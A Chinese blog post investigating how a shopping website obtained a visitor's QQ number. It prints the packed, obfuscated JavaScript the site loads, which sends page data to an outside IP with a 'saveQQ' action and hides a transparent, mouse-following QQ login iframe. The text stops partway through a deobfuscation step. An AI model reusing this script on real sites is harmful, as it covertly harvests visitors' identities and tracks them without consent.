0.起因
刚上QQ就看到小八同学给我发来消息,说她刚打开一个网站还没看,停了十几秒的样子,就收到了这个网站发来的广告邮件,并且是准确无误地发到了她的QQ邮箱里,而她并没有用QQ登录这个网站,所以很疑惑怎么被黑的。
听到这个事儿的第一反应是,应该是广告浮窗吧——因为之前遇到过进网站然后右下角搞个假模假样的浮窗说你收到了新邮件。可是仔细看了看觉得好像是真的——
那个QQ号和名字信息确实都是正确的。既然如此,那确实有必要看一下了。
1.简单了解
祭出Fiddler抓包。清除所有浏览器缓存后,浏览目标网页(http://www.zxdl369.cn/onlineshop/fojiaoyongpin/tongzhutai/)。等待所有网页加载完成后,查看一下Fiddler中记录的请求,确实有比较奇怪的请求,这些请求的主机或网址明显与所打开的网址完全不符,其中还混入了一些不和谐的搜狗味道。
(以上已过滤掉明显无异常且与本文无关的请求)
仔细审阅这些请求后,赫然发现确实有个请求竟然返回了我的QQ号到Cookies里,而这个请求的主机很明显不是企鹅的东西。
看来必须追查了。
2.追查
既然要追查,那么就要找到源头。根据大致的判断,请求肯定出现在那些奇奇怪怪的第三方请求里(因为从这个网站做的质量来看……我觉得乃们木有这水平)。
因此找到之前那张图里第一个标注红圈儿的#13号请求。这个请求的来源是哪里呢?在Chrome中简单追查了一下,找到了来源。
……直接就是网页带进来的吗?好吧。
我们看看这个请求的内容是什么。
看起来是一段已加密的JS。
var puid="5867″;var pap="http://182.92.239.23/g.php?surl=";var pr = encodeURIComponent(document.referrer);var pu = encodeURIComponent(document.location.href);var pt = encodeURIComponent(document.title);var phead = document.getElementsByTagName('HEAD').item(0);var cslist="uid="+puid+"&r=" + pr + "&u=" + pu + "&t=" + pt;var purl = encodeURIComponent("http://42.120.11.238:8888/?action=p&"+cslist+"&f=jfif&p=");function Cimg(src) {var a = document.createElement("img");a.src = src;a.style = "display:none";};function Cifr(src) {var ifr = document.createElement("iframe");ifr.src = src;ifr.width =ifr.height= ifr.frameBorder=0;ifr.scrolling = "no";ifr.allowTransparency = "true";ifr.style.display='none';phead.appendChild(ifr);};Cifr(pap + purl);
var i_php = "http://42.120.11.238:8888/";var i_uid = "5867";var i_h="0″;var i_qq="0″;var i_d="www.zxdl369.cn"; var i_yc= 2000;var i_fkid="1416369920″;
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c–)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C j=["\\m\\l\\k\\v","\\4l\\1t\\1l\\2d","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\w\\1n\\O\\1e\\q\\E\\2z\\q\\v\\k","\\p\\k\\G\\k\\p\\p\\k\\p","\\B\\p\\k\\G","\\s\\n\\u\\q\\l\\m\\n\\o","\\l\\m\\l\\s\\k","\\m\\G\\p\\q\\v\\k","\\u\\p\\k\\q\\l\\k\\1t\\s\\k\\v\\k\\o\\l","\\w\\p\\u","","\\m\\y","\\u\\w\\w\\1e\\k\\R\\l","\\w\\l\\O\\s\\k","\\1b\\m\\y\\l\\B\\N\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\F\\r\\R\\L\\y\\m\\w\\r\\s\\q\\O\\N\\o\\n\\o\\k\\L","\\w\\u\\p\\n\\s\\s\\m\\o\\E","\\o\\n","\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p","\\F","\\w\\k\\l\\1l\\l\\l\\p\\m\\H\\x\\l\\k","\\q\\r\\r\\k\\o\\y\\1k\\B\\m\\s\\y","\\w\\u\\p\\m\\r\\l","\\l\\O\\r\\k","\\l\\k\\R\\l\\M\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l","\\u\\B\\q\\p\\w\\k\\l","\\x\\l\\G\\1a\\1Z","\\1n\\1Y\\2d\\1X","\\1f\\2e\\2h\\P\\1c","\\t\\1f\\4j\\2e\\L\\4e\\3U\\1c\\1f\\L\\2h\\2M\\1c","\\v\\q\\l\\u\\B","\\u\\n\\n\\W\\m\\k","\\E\\k\\l\\1e\\m\\v\\k","\\w\\k\\l\\1e\\m\\v\\k","\\t","\\L\\k\\R\\r\\m\\p\\k\\w\\t","\\l\\n\\3S\\2c\\1e\\1j\\l\\p\\m\\o\\E","\\1g\\q\\u\\l\\m\\n\\o\\t\\w\\q\\X\\k\\2f\\2f\\z\\x\\m\\y\\t","\\z\\I\\1p\\t","\\z\\l\\m\\v\\k\\t","\\z\\p\\k\\G\\k\\p\\p\\k\\p\\t","\\z\\x\\p\\s\\t","\\z\\l\\m\\l\\s\\k\\t","\\z\\p\\t","\\w\\v\\k\\X\\o\\Q\\y\\x","\\M\\w\\R\\K\\r\\B\\r\\1g\\x\\m\\y\\t","\\z\\p\\k\\G\\t","\\z\\G\\x\\p\\s\\t","\\z\\G\\W\\m\\y\\t","\\z\\l\\v\\t","\\M\\v\\M\\1b\\y\\s\\K\\r\\B\\r\\1g\\u\\t","\\z\\p\\t\\V\\z\\l\\m\\v\\k\\t","\\1X","\\x\\w\\k\\p\\1l\\E\\k\\o\\l","\\m\\G\\r\\l\\x\\Q\\x","\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\3N\\m\\G\\p\\q\\v\\k\\P\\w\\l\\O\\s\\k\\t\\T\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\1b\\m\\y\\l\\B\\N\\Q\\1Z\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\1I\\1H\\1H\\r\\R\\L\\P\\v\\q\\p\\E\\m\\o\\N\\1a\\V\\Q\\F\\r\\R\\P\\F\\P\\F\\P\\1a\\1I\\1G\\F\\r\\R\\L\\G\\m\\s\\l\\k\\p\\N\\q\\s\\r\\B\\q\\1f\\n\\r\\q\\u\\m\\l\\O\\t\\F\\F\\1c\\L\\1a\\v\\n\\1p\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\F\\K\\F\\L\\1a\\W\\B\\l\\v\\s\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\T\\P\\w\\u\\p\\n\\s\\s\\m\\o\\E\\t\\T\\o\\n\\T\\P\\o\\q\\v\\k\\t\\T\\v\\H\\Q\\x\\T\\P\\m\\y\\t\\T\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o\\T\\P\\w\\p\\u\\t\\T\\B\\l\\l\\r\\N\\M\\M\\x\\m\\K\\r\\l\\s\\n\\E\\m\\o\\Y\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\1a\\H\\m\\o\\M\\s\\n\\E\\m\\o\\1g\\s\\m\\o\\W\\U\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\q\\r\\r\\m\\y\\t\\1H\\F\\F\\F\\Y\\F\\V\\z\\y\\q\\m\\y\\t\\Y\\Y\\F\\z\\B\\m\\y\\k\\U\\x\\m\\o\\U\\l\\m\\r\\t\\V\\z\\w\\l\\O\\s\\k\\t\\V\\V\\z\\B\\m\\y\\k\\U\\u\\s\\n\\w\\k\\U\\m\\u\\n\\o\\t\\V\\z\\l\\q\\p\\E\\k\\l\\t\\w\\k\\s\\G\\z\\I\\l\\q\\p\\E\\k\\l\\t\\F\\z\\B\\m\\y\\k\\U\\l\\m\\l\\s\\k\\U\\H\\q\\p\\t\\V\\z\\w\\U\\x\\p\\s\\t\\B\\l\\l\\r\\1w\\1I\\1l\\1w\\Y\\1x\\1w\\Y\\1x\\q\\r\\r\\K\\y\\q\\l\\q\\K\\I\\I\\K\\u\\n\\v\\1w\\Y\\1x\\u\\q\\l\\k\\1w\\Y\\1x\\r\\n\\r\\1y\\n\\E\\m\\o\\T\\P\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p\\t\\T\\F\\T\\P\\n\\o\\s\\n\\q\\y\\t\\T\\w\\k\\l\\1e\\m\\v\\k\\n\\x\\l\\1f\\l\\n\\r\\K\\v\\H\\Q\\x\\U\\m\\G\\v\\n\\X\\k\\3L\\F\\1c\\L\\T\\3I","\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l\\N\\r\\q\\p\\k\\o\\l\\K\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\P\\1p\\1a\\m\\o\\y\\k\\R\\N\\P\\Y\\V\\1G\\2o\\1G\\1Z\\1I\\1H\\1G\\2o\\L\\1b\\m\\y\\l\\B\\N\\Q\\F\\r\\R\\L\\P\\B\\k\\m\\E\\B\\l\\N\\Q\\F\\r\\R\\L\\P","\\n\\o\\k\\p\\p\\n\\p","\\p\\k\\l\\x\\p\\o\\P\\l\\p\\x\\k\\L","\\G\\m\\p\\w\\l\\1k\\B\\m\\s\\y","\\H\\n\\y\\O","\\m\\o\\w\\k\\p\\l\\1n\\k\\G\\n\\p\\k","\\u\\x\\p\\p\\k\\o\\l\\1j\\l\\O\\s\\k","\\E\\k\\l\\1k\\n\\v\\r\\x\\l\\k\\y\\1j\\l\\O\\s\\k","\\1a\\2M\\V","\\p\\k\\r\\s\\q\\u\\k","\\l\\n\\1y\\n\\1b\\k\\p\\1k\\q\\w\\k","\\y\\k\\G\\q\\x\\s\\l\\3E\\m\\k\\1b","\\v\\H\\Q\\x\\U\\m\\G\\v\\n\\X\\k","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\1n\\O\\3D\\y","\\n\\o\\v\\n\\x\\w\\k\\v\\n\\X\\k","\\G\\n\\u\\x\\w","\\k\\X\\k\\o\\l","\\u\\s\\m\\k\\o\\l\\3x","\\u\\s\\m\\k\\o\\l\\1X","\\w\\u\\p\\n\\s\\s\\1e\\n\\r","\\y\\n\\u\\x\\v\\k\\o\\l\\1t\\s\\k\\v\\k\\o\\l","\\n\\G\\G\\w\\k\\l\\2u\\m\\y\\l\\B","\\w\\u\\p\\n\\s\\s\\1y\\k\\G\\l","\\r\\n\\w\\m\\l\\m\\n\\o","\\u\\s\\m\\k\\o\\l\\2u\\m\\y\\l\\B","\\p\\k\\s\\q\\l\\m\\X\\k","\\l\\n\\r","\\r\\R","\\s\\k\\G\\l","\\n\\o\\v\\n\\x\\w\\k\\n\\X\\k\\p","\\n\\o\\v\\n\\x\\w\\k\\n\\x\\l","\\n\\o\\H\\s\\x\\p","\\y\\m\\w\\r\\s\\q\\O","\\o\\n\\o\\k","\\k\\s\\k\\v\\k\\o\\l\\1x\\p\\n\\v\\2v\\n\\m\\o\\l","\\u\\s\\m\\u\\W","\\V","\\l\\k\\o\\u\\k\\o\\l\\N\\M\\M\\v\\k\\w\\w\\q\\E\\k\\M\\1g\\x\\m\\o\\t","\\z\\1j\\m\\l\\k\\t","\\z\\2c\\k\\o\\x\\t\\O\\k\\w","\\I\\I\\u\\B\\q\\l\\Q\\x\\V","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\s\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\u\\n\\o\\X\\K\\r\\B\\r\\1g\\o\\x\\v\\t","\\z\\u\\H\\t\\3w\\1j\\1Y\\2z\\2v\\U\\1k\\1l\\1y\\1y\\1n\\1l\\1k\\3v\\U\\Q\\x","\\H\\m\\1p\\I\\I\\W\\k\\O","\\W\\G\\x\\m\\o","\\y\\q\\l\\q","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\y\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\E\\k\\l\\U\\w\\m\\E\\o\\K\\r\\B\\r\\1g\\o\\q\\t","\\z\\W\\G\\x\\m\\o\\t","\\z\\q\\l\\O\\t\\F\\z\\q\\t\\F\\z\\w\\m\\y\\t\\z\\x\\m\\y\\t\\z\\x\\p\\s\\t","\\z\\y\\v\\t\\z\\u\\s\\W\\1j\\p\\u\\t\\z\\k\\R\\l\\t\\z\\u\\H\\t\\H\\m\\1p\\I\\I\\W\\k\\O\\Q\\x","\\z\\q\\v\\r\\L","\\z","\\w\\m\\E\\o","\\M","\\I\\I\\u\\B\\q\\l\\Q\\x\\Y","\\m\\o\\y\\k\\R\\1Y\\G","\\y\\n\\v\\q\\m\\o","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\V\\1c","\\Y","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\1c"];C 1Q=D[j[2]](j[1])[j[0]](0);C 1D=0;C 2K=0;C 1r=1L;C 1R=1M(D[j[3]]);C 1E=1M(D[j[5]][j[4]]);C 1F=1M(D[j[6]]);J 2m(b,c){C a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);1Q[j[20]](a)}J 1s(b,c){C a=D[j[8]](j[21]);a[j[22]]=j[23];S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[24]]=j[25];a[j[9]]=b;1Q[j[20]](a)}J 1N(b,c){C a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);D[j[2]](j[26])[j[0]](0)[j[20]](a)}J 2j(a){C b,2k=1z 3s(j[27]+a+j[28]);S(b=D[j[30]][j[29]](2k)){1o 3o(b[2])}1J{1o 1d}}J 2s(a,b){C c=1z 1K();c[j[32]](c[j[31]]()+2*24*1T*1T*2x);D[j[30]]=a+j[33]+3j(b)+j[34]+c[j[35]]()}J 3i(){C a=1W+j[36]+2E+j[37]+3g+j[38]+3a+j[39]+1R+j[40]+1E+j[41]+1F+j[42]+(1z 1K())[j[31]]();1s(a,j[43])}J 2a(){C a=1W+j[44]+2E+j[45]+1R+j[46]+1E+j[41]+1F+j[47]+2P+j[48]+(1z 1K())[j[31]]();2m(a)}J 2O(){C a=1W+j[49]+2P+j[2Q]+(1z 1K)[j[31]]();1s(a);1v(2L,2R)}J 2L(){S(2S==j[2T]){S(!2U[j[2V]][j[29]](/(2W|2X|2Y|2Z)/i)){S(2j(j[2I])==1d){2H()}}}}J 2H(){1m[j[1u]]=j[3b];C a=D[j[8]](j[7]);a[j[9]]=j[3c];a[j[11]]=j[1u];a[j[13]][j[12]]=j[3d];a[j[15]]=j[16];a[j[3e]]=j[3f];a[j[19]](j[17],j[18],0);C b=D[j[1h]][j[1T]];D[j[1h]][j[3h]](a,b)}J 2F(a,b){S(a[j[2D]]){1o a[j[2D]][b]}1J{S(1m[j[2B]]){1V=b[j[1U]](/([A-Z])/g,j[3k]);1V=b[j[3l]]();1o D[j[3m]][j[2B]](a,1d)[1V]}};1o 1d}1m[j[3n]]=J(){C h=D[j[1S]](j[1u]);2q(h,2n);D[j[3p]]=J(a){1r=1L;1m[j[3q]]();C b=D[j[1S]](j[1u]);C a=a||1m[j[3r]];1D=a[j[1i]];1D=a[j[1P]];C c=D[j[1h]][j[2i]]+D[j[1A]][j[2i]];C d=D[j[1A]][j[1q]]-a[j[1i]];C e=D[j[1h]][j[2g]]+D[j[1A]][j[2g]];C f=0;C g=2F(D[j[1h]],j[3t]);S(D[j[1A]][j[1C]]>D[j[1h]][j[1C]]&&g==j[3u]){f=(D[j[1A]][j[1C]]-D[j[1h]][j[1C]])/2;f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])-f)+j[1B]}1J{f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])+f)+j[1B]}}};J 2q(a,b){a[j[3y]]=J(){1r=3z};a[j[3A]]=J(){1r=1L};1m[j[3B]]=J(){S(1r){b()}}}J 2n(){C b=D[j[1S]](j[1u]);1v(J(){3C{b[j[13]][j[2r]]=j[2p];C a=D[j[3F]](1D,2K);a[j[3G]]()}3H(e){b[j[13]][j[2r]]=j[2p]};2a();2s(j[2I],j[2l])},2x)}J 3J(i){S(i==1){C a=j[3K]+1O+j[3M]+2G+j[3O];1N(a,j[3P])}1J{1s(j[3Q]+1O+j[3R],j[2b])}}J 3T(a){C b=a[j[2J]][j[3V]];1s(j[3W]+1O+j[3X]+b+j[3Y]+1E+j[41]+1F+j[3Z],j[2b])}J 4a(a){C b=a[j[2J]][j[4b]][j[1U]](j[4c],j[4d]);b=b[j[1U]](j[2C],j[2C]);1N(b,j[4f])}S(D[j[4g]][j[4h]](2G)>=0){2a();1v(2O,4i);S(2A==j[2l]){1v(j[4k],2w)};S(2A==j[4m]){1v(j[4n],2w)}};',62,272,'|||||||||||||||||||_0xc112|x65|x74|x69|x6F|x6E|x72|x61|x70|x6C|x3D|x63|x6D|x73|x75|x64|x26||x68|var|document|x67|x30|x66|x62|x71|function|x2E|x3B|x2F|x3A|x79|x20|x35|x78|if|x22|x5F|x31|x6B|x76|x32||||||||||||x2D|x77|x29|null|x54|x28|x3F|61|74|x53|x43|x41|window|x42|return|x7A|78|mb5u_iframe_hover|Creatjs5u|x45|54|setTimeout|x25|x46|x4C|new|77|84|81|mb5ux|i_url|i_title|x34|x36|x33|else|Date|false|encodeURIComponent|Creatif5ubody|i_qq|75|mb5u_oHead|i_referrer|70|60|66|propprop|i_php|x59|x4F|x38|||||||||||Umb5u|100|x4D|x44|x5E|x51|79|x7C|76|Gc5u|reg|93|Creatif5u|mb5uiframeclickcallback|x37|90|mb5u_iframeClick|89|Sc5u|85|x57|x50|i_yc|1000|83|x4E|i_h|64|110|63|i_uid|mb5u_GetCurrentStyle|i_d|ptU5u|53|102|mb5uy|ck5u|x24|x6A|mb5u_noLogin|i_fkid|50|500|wdl|51|navigator|52|iPhone|iPod|Android|ios|||||||||||i_time|55|56|57|58|59|i_qz|62|Q5u|escape|65|67|68|69|unescape|71|72|73|RegExp|80|82|x4B|x4A|x58|86|true|87|88|try|x49|x56|91|92|catch|x3E|qqchat5u|94|x2C|95|x3C|96|97|98|99|x47|JSONP_CALLBACK_5u|x2A|101|103|104|105|106|||||||||||bizqqkey5u|109|107|108|x5D|111|113|112|1500|x5B|114|x48|115|116′.split('|'),0,{}));
别看这段JS不长,其实还挺厉害的嘞……经过了二次混淆!我们先进行第一次反混淆。
var _0xc112=["\x69\x74\x65\x6D","\x48\x45\x41\x44″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,"\x72\x65\x66\x65\x72\x72\x65\x72″,"\x68\x72\x65\x66″,"\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x69\x74\x6C\x65″,"\x69\x66\x72\x61\x6D\x65″,"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,"\x73\x72\x63″,"","\x69\x64″,"\x63\x73\x73\x54\x65\x78\x74″,"\x73\x74\x79\x6C\x65″,"\x77\x69\x64\x74\x68\x3A\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x30\x70\x78\x3B\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x3B","\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67″,"\x6E\x6F","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72″,"\x30″,"\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65″,"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,"\x73\x63\x72\x69\x70\x74″,"\x74\x79\x70\x65″,"\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74″,"\x63\x68\x61\x72\x73\x65\x74″,"\x75\x74\x66\x2D\x38″,"\x42\x4F\x44\x59″,"\x28\x5E\x7C\x20\x29″,"\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29″,"\x6D\x61\x74\x63\x68″,"\x63\x6F\x6F\x6B\x69\x65″,"\x67\x65\x74\x54\x69\x6D\x65″,"\x73\x65\x74\x54\x69\x6D\x65″,"\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67″,"\x3F\x61\x63\x74\x69\x6F\x6E\x3D\x73\x61\x76\x65\x51\x51\x26\x75\x69\x64\x3D","\x26\x71\x7A\x3D","\x26\x74\x69\x6D\x65\x3D","\x26\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x26\x75\x72\x6C\x3D","\x26\x74\x69\x74\x6C\x65\x3D","\x26\x72\x3D","\x73\x6D\x65\x76\x6E\x35\x64\x75″,"\x2F\x73\x78\x2E\x70\x68\x70\x3F\x75\x69\x64\x3D","\x26\x72\x65\x66\x3D","\x26\x66\x75\x72\x6C\x3D","\x26\x66\x6B\x69\x64\x3D","\x26\x74\x6D\x3D","\x2F\x6D\x2F\x77\x64\x6C\x2E\x70\x68\x70\x3F\x63\x3D","\x26\x72\x3D\x31\x26\x74\x69\x6D\x65\x3D","\x59″,"\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,"\x69\x66\x70\x74\x75\x35\x75″,"\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x77\x69\x64\x74\x68\x3A\x35\x38\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x33\x36\x36\x70\x78\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x2D\x31\x35\x30\x70\x78\x20\x30\x20\x30\x20\x2D\x33\x34\x30\x70\x78\x3B\x66\x69\x6C\x74\x65\x72\x3A\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x63\x69\x74\x79\x3D\x30\x30\x29\x3B\x2D\x6D\x6F\x7A\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x30\x2E\x30\x3B\x2D\x6B\x68\x74\x6D\x6C\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x62\x35\x75\x22\x20\x69\x64\x3D\x22\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x75\x69\x2E\x70\x74\x6C\x6F\x67\x69\x6E\x32\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2D\x62\x69\x6E\x2F\x6C\x6F\x67\x69\x6E\x3F\x6C\x69\x6E\x6B\x5F\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x61\x70\x70\x69\x64\x3D\x36\x30\x30\x30\x32\x30\x31\x26\x64\x61\x69\x64\x3D\x32\x32\x30\x26\x68\x69\x64\x65\x5F\x75\x69\x6E\x5F\x74\x69\x70\x3D\x31\x26\x73\x74\x79\x6C\x65\x3D\x31\x31\x26\x68\x69\x64\x65\x5F\x63\x6C\x6F\x73\x65\x5F\x69\x63\x6F\x6E\x3D\x31\x26\x74\x61\x72\x67\x65\x74\x3D\x73\x65\x6C\x66\x26\x71\x74\x61\x72\x67\x65\x74\x3D\x30\x26\x68\x69\x64\x65\x5F\x74\x69\x74\x6C\x65\x5F\x62\x61\x72\x3D\x31\x26\x73\x5F\x75\x72\x6C\x3D\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x61\x70\x70\x2E\x64\x61\x74\x61\x2E\x71\x71\x2E\x63\x6F\x6D\x25\x32\x46\x63\x61\x74\x65\x25\x32\x46\x70\x6F\x70\x4C\x6F\x67\x69\x6E\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x28\x74\x6F\x70\x2E\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65\x2C\x30\x29\x3B\x22\x3E","\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x70\x61\x72\x65\x6E\x74\x2E\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x32\x31\x34\x37\x34\x38\x33\x36\x34\x37\x3B\x77\x69\x64\x74\x68\x3A\x35\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x35\x30\x70\x78\x3B\x20″,"\x6F\x6E\x65\x72\x72\x6F\x72″,"\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64″,"\x62\x6F\x64\x79″,"\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,"\x63\x75\x72\x72\x65\x6E\x74\x53\x74\x79\x6C\x65″,"\x67\x65\x74\x43\x6F\x6D\x70\x75\x74\x65\x64\x53\x74\x79\x6C\x65″,"\x2D\x24\x31″,"\x72\x65\x70\x6C\x61\x63\x65″,"\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65″,"\x64\x65\x66\x61\x75\x6C\x74\x56\x69\x65\x77″,"\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65″,"\x66\x6F\x63\x75\x73″,"\x65\x76\x65\x6E\x74″,"\x63\x6C\x69\x65\x6E\x74\x58″,"\x63\x6C\x69\x65\x6E\x74\x59″,"\x73\x63\x72\x6F\x6C\x6C\x54\x6F\x70″,"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74″,"\x6F\x66\x66\x73\x65\x74\x57\x69\x64\x74\x68″,"\x73\x63\x72\x6F\x6C\x6C\x4C\x65\x66\x74″,"\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x63\x6C\x69\x65\x6E\x74\x57\x69\x64\x74\x68″,"\x72\x65\x6C\x61\x74\x69\x76\x65″,"\x74\x6F\x70″,"\x70\x78″,"\x6C\x65\x66\x74″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x75\x74″,"\x6F\x6E\x62\x6C\x75\x72″,"\x64\x69\x73\x70\x6C\x61\x79″,"\x6E\x6F\x6E\x65″,"\x65\x6C\x65\x6D\x65\x6E\x74\x46\x72\x6F\x6D\x50\x6F\x69\x6E\x74″,"\x63\x6C\x69\x63\x6B","\x31″,"\x74\x65\x6E\x63\x65\x6E\x74\x3A\x2F\x2F\x6D\x65\x73\x73\x61\x67\x65\x2F\x3F\x75\x69\x6E\x3D","\x26\x53\x69\x74\x65\x3D","\x26\x4D\x65\x6E\x75\x3D\x79\x65\x73″,"\x71\x71\x63\x68\x61\x74\x35\x75\x31″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x6C\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x63\x6F\x6E\x76\x2E\x70\x68\x70\x3F\x6E\x75\x6D\x3D","\x26\x63\x62\x3D\x4A\x53\x4F\x4E\x50\x5F\x43\x41\x4C\x4C\x42\x41\x43\x4B\x5F\x35\x75″,"\x62\x69\x7A\x71\x71\x6B\x65\x79″,"\x6B\x66\x75\x69\x6E","\x64\x61\x74\x61″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x64\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x67\x65\x74\x5F\x73\x69\x67\x6E\x2E\x70\x68\x70\x3F\x6E\x61\x3D","\x26\x6B\x66\x75\x69\x6E\x3D","\x26\x61\x74\x79\x3D\x30\x26\x61\x3D\x30\x26\x73\x69\x64\x3D\x26\x75\x69\x64\x3D\x26\x75\x72\x6C\x3D","\x26\x64\x6D\x3D\x26\x63\x6C\x6B\x53\x72\x63\x3D\x26\x65\x78\x74\x3D\x26\x63\x62\x3D\x62\x69\x7A\x71\x71\x6B\x65\x79\x35\x75″,"\x26\x61\x6D\x70\x3B","\x26″,"\x73\x69\x67\x6E","\x2F","\x71\x71\x63\x68\x61\x74\x35\x75\x32″,"\x69\x6E\x64\x65\x78\x4F\x66″,"\x64\x6F\x6D\x61\x69\x6E","\x71\x71\x63\x68\x61\x74\x35\x75\x28\x31\x29″,"\x32″,"\x71\x71\x63\x68\x61\x74\x35\x75\x28\x29″];var 